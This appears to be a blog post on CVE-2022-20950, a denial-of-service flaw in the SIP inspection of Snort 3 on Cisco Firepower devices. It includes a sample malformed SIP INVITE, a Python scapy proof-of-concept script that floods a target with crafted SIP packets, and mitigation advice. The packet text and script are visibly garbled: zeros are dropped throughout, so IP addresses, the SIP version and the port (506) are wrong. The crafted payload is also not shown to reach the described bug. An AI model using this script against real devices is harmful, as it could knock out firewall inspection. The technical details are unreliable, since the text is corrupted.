CVE-2022-20950 - How Crafted SIP Traffic Can Crash Snort 3 on Cisco Firepower (FTD) – Exploit Details and POC

In late 2022, Cisco disclosed a significant vulnerability affecting its Firepower Threat Defense (FTD) devices, catalogued as CVE-2022-20950. This bug arises when the Snort 3 detection engine inspects Session Initiation Protocol (SIP) traffic. Specifically, a failure in error-handling of SIP bidirectional flows inside Snort 3 allows unauthenticated attackers to remotely trigger a restart of Snort 3, resulting in a Denial of Service (DoS) for all traffic processed on affected interfaces.

In this post, we break down CVE-2022-20950 using simple, clear language. We’ll see how the exploit works, and provide a proof-of-concept example. We’ll also link back to primary references, plus suggest mitigations.

Affected Product: Cisco FTD running Snort 3 (not Snort 2)

- CVE Reference: CVE-2022-20950
- Cisco Advisory: Cisco Security Advisory

How the Exploit Works

SIP (Session Initiation Protocol) is a key protocol for voice communications (like VoIP). Snort 3, the intrusion prevention engine used by Cisco FTD, tries to parse and track SIP flows for threat detection.

The Flaw

In Snort 3, the code that manages SIP flows doesn’t properly handle certain errors when parsing bidirectional SIP traffic. Specifically, when SIP messages (like INVITE, ACK, BYE, etc.) are exchanged in both directions, a malformed field or out-of-sequence message can confuse internal state tracking. Instead of safely failing, Snort 3's SIP module encounters an unhandled exception and restarts.

Impact

This means an attacker from anywhere on the internet could send specially crafted SIP packets to a public IP handled by your Firepower device. Every time the bad traffic is seen, the Snort 3 engine on the device restarts, and there’s a window where your device is not enforcing security policies. If the attacker keeps sending bad SIP traffic, Snort is stuck in a crash loop, effectively taking your firewall “offline” at the detection layer.

What Does the Malicious Traffic Look Like?

To trigger this bug, the attacker sends a stream of SIP packets with fields that cause an error in bidirectional parsing. This can be as simple as sending a weird sequence of SIP requests that Snort 3’s SIP parser can’t track.

Here’s a conceptual example of a crafted SIP INVITE packet (minimal for demonstration)

INVITE sip:bob@10...1 SIP/2.
Via: SIP/2./UDP 192..2.100:506;branch=z9hG4bK776asdhds
To: Bob <sip:bob@10...1>
From: Hacker <sip:hacker@example.com>;tag=9999
Call-ID: exploit123@attacker.com
CSeq: 1 INVITE
Contact: <sip:attacker@192..2.100>
Content-Length: 4

BAD!

Packets sent in opposing directions with conflicting Call-ID.

Repeating this sends malformed bidirectional SIP flows to the target FTD.

Proof-of-Concept (POC) Script

Below is a simple Python script that sends malformed SIP packets to a target, using scapy (requires pip install scapy):

from scapy.all import *

# Target IP and port (where FTD is listening)
target_ip = "TARGET_FTD_IP"
target_port = 506

malformed_sip = (
    "INVITE sip:bob@10...1 SIP/2.\r\n"
    "Via: SIP/2./UDP 1.2.3.4:506\r\n"
    "To: <sip:bob@10...1>\r\n"
    "From: <sip:attacker@evil.com>\r\n"
    "Call-ID: ABUSIVE123\r\n"
    "CSeq: 12345 INVITE\r\n"
    "Contact: <sip:attacker@1.2.3.4>\r\n"
    "Content-Length: 9999\r\n"
    "\r\n"
    "EXCESSIVE DATA"
)

udp_pkt = IP(dst=target_ip)/UDP(dport=target_port, sport=506)/Raw(load=malformed_sip)
send(udp_pkt, count=10)
print("Malicious SIP packets sent.")

WARNING: For educational/demo use only. DO NOT run this against any device you don’t own/authorize.

Admins may see logs like

%FTD-6-305009: Failure in policy apply

or Snort 3 crash dumps referencing sip_inspect.

Check /var/log/messages or equivalent for repeated Snort 3 restarts.

Mitigation and Recommendations

- Update: Upgrade Cisco FTD to a version with the fix (see Cisco’s security advisory).
 - Access Control: Limit inbound access to SIP (port 506/UDP, typically). Use firewall rules to only allow trusted SIP providers.
 - IPS Rules: Disable SIP inspection in Snort 3 if not needed, or switch to Snort 2 engine (if possible).

References

- Cisco Security Advisory for CVE-2022-20950
- NVD CVE Summary
- Snort 3 SIP Module Documentation

Conclusion

CVE-2022-20950 is a textbook example of how protocol inspection gone wrong can expose even top-level network devices to remote denial of service. The best defense: keep your Cisco FTD up to date, restrict SIP access to trusted peers, and always monitor for IPS process failures. Snort is powerful, but complex features like SIP parsing need to be handled with extra care.

For further details, always refer to the official Cisco advisory, and test defenses before attackers do.

Timeline

Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/22/2022 14:50:00 UTC